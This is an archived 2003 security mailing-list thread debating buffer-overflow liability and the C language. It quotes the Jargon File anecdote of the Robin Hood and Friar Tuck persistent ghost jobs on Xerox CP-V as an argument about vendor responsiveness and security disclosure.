somebody (else) commented (in the thread) that anybody that currently (still) writes code resulting in buffer overflow exploit maybe should be thrown in jail.
A nice essay, partly on the need to include technological protections against human error, included the above paragraph. IMHO, the problem is that the C language is just too error-prone to be used for most software. In "Thirty Years Later: Lessons from the Multics Security Evaluation", Paul A. Karger and Roger R. Schell <www.acsac.org/2002/papers/classic-multics.pdf> credit the use of PL/I for the lack of buffer overruns in Multics. However, in the Unix/Linux/PC/Mac world, a successor language has not yet appeared. YMMV - Bill ------------------------------------------------------------------------- Bill Frantz | Due process for all | Periwinkle -- Consulting (408)356-8506 | used to be the | 16345 Englewood Ave. frantz@pwpconsult.com | American way. | Los Gatos, CA 95032, USA
The problem with these stop-the-crackers-and-hackers-by-law approaches is that they allow software developers to get away with leaving huge gaping security holes unfixed. Anecdotal evidence: the classic, well-known Robin Hood and Friar Tuck "hack". These days, the bug wouldn't get fixed, and the guys reporting it would wind up in jail because of the way they "convinced" the OS authors to fix it. IMHO, not the right way to go at all. From http://ftp.arl.mil/ftp/unix-wizards/V16%23017 scroll down a bit more than half way down the page (also available from most other GNU sources):

Back in the mid-1970s, several of the system support staff at Motorola discovered a relatively simple way to crack system security on the Xerox CP-V timesharing system. Through a simple programming strategy, it was possible for a user program to trick the system into running a portion of the program in `master mode' (supervisor state), in which memory protection does not apply. The program could then poke a large value into its `privilege level' byte (normally write-protected) and could then proceed to bypass all levels of security within the file-management system, patch the system monitor, and do numerous other interesting things. In short, the barn door was wide open.

Motorola quite properly reported this problem to Xerox via an official `level 1 SIDR' (a bug report with an intended urgency of `needs to be fixed yesterday'). Because the text of each SIDR was entered into a database that could be viewed by quite a number of people, Motorola followed the approved procedure: they simply reported the problem as `Security SIDR', and attached all of the necessary documentation, ways-to-reproduce, etc.

The CP-V people at Xerox sat on their thumbs; they either didn't realize the severity of the problem, or didn't assign the necessary operating-system-staff resources to develop and distribute an official patch. Months passed. The Motorola guys pestered their Xerox field-support rep, to no avail.
Finally they decided to take direct action, to demonstrate to Xerox management just how easily the system could be cracked and just how thoroughly the security safeguards could be subverted. They dug around in the operating-system listings and devised a thoroughly devilish set of patches. These patches were then incorporated into a pair of programs called `Robin Hood' and `Friar Tuck'. Robin Hood and Friar Tuck were designed to run as `ghost jobs' (daemons, in UNIX terminology); they would use the existing loophole to subvert system security, install the necessary patches, and then keep an eye on one another's statuses in order to keep the system operator (in effect, the superuser) from aborting them.

One fine day, the system operator on the main CP-V software development system in El Segundo was surprised by a number of unusual phenomena. These included the following:

* Tape drives would rewind and dismount their tapes in the middle of a job.
* Disk drives would seek back and forth so rapidly that they would attempt to walk across the floor (see {walking drives}).
* The card-punch output device would occasionally start up of itself and punch a {lace card}. These would usually jam in the punch.
* The console would print snide and insulting messages from Robin Hood to Friar Tuck, or vice versa.
* The Xerox card reader had two output stackers; it could be instructed to stack into A, stack into B, or stack into A (unless a card was unreadable, in which case the bad card was placed into stacker B). One of the patches installed by the ghosts added some code to the card-reader driver... after reading a card, it would flip over to the opposite stacker. As a result, card decks would divide themselves in half when they were read, leaving the operator to recollate them manually.

Naturally, the operator called in the operating-system developers. They found the bandit ghost jobs running, and X'ed them... and were once again surprised.
When Robin Hood was X'ed, the following sequence of events took place:

!X id1
id1: Friar Tuck... I am under attack! Pray save me!
id1: Off (aborted)
id2: Fear not, friend Robin! I shall rout the Sheriff of Nottingham's men!
id1: Thank you, my good fellow!

Each ghost-job would detect the fact that the other had been killed, and would start a new copy of the recently slain program within a few milliseconds. The only way to kill both ghosts was to kill them simultaneously (very difficult) or to deliberately crash the system.

Finally, the system programmers did the latter --- only to find that the bandits appeared once again when the system rebooted! It turned out that these two programs had patched the boot-time OS image (the kernel file, in UNIX terms) and had added themselves to the list of programs that were to be started at boot time. The Robin Hood and Friar Tuck ghosts were finally eradicated when the system staff rebooted the system from a clean boot-tape and reinstalled the monitor. Not long thereafter, Xerox released a patch for this problem.

It is alleged that Xerox filed a complaint with Motorola's management about the merry-prankster actions of the two employees in question. It is not recorded that any serious disciplinary action was taken against either of them.

----------------------Kaos-Keraunos-Kybernetos--------------------------- + ^ + :25Kliters anthrax, 38K liters botulinum toxin, 500 tons of /|\ \|/ :sarin, mustard and VX gas, mobile bio-weapons labs, nukular /\|/\ <--*-->:weapons.. Reasons for war on Iraq - GWB 2003-01-28 speech. \/|\/ /|\ :Found to date: 0. Cost of war: $800,000,000,000 USD. \|/ + v + : The look on Sadam's face - priceless! --------_sunder_@_sunder_._net_------- http://www.sunder.net ------------

On Tue, 10 Jun 2003, Bill Frantz wrote:
At 5:12 PM -0700 6/8/03, Anne & Lynn Wheeler wrote:
somebody (else) commented (in the thread) that anybody that currently (still) writes code resulting in buffer overflow exploit maybe should be thrown in jail.
A nice essay, partially on the need to include technological protections against human error, included the above paragraph.
IMHO, the problem is that the C language is just too error prone to be used for most software. In "Thirty Years Later: Lessons from the Multics Security Evaluation", Paul A. Karger and Roger R. Schell <www.acsac.org/2002/papers/classic-multics.pdf> credit the use of PL/I for the lack of buffer overruns in Multics. However, in the Unix/Linux/PC/Mac world, a successor language has not yet appeared.
participants (10)
-
Amir Herzberg
-
Anne & Lynn Wheeler
-
Bill Frantz
-
Dave Howe
-
James A. Donald
-
John S. Denker
-
Matt Crawford
-
Sean Smith
-
Sunder
-
Tim Dierks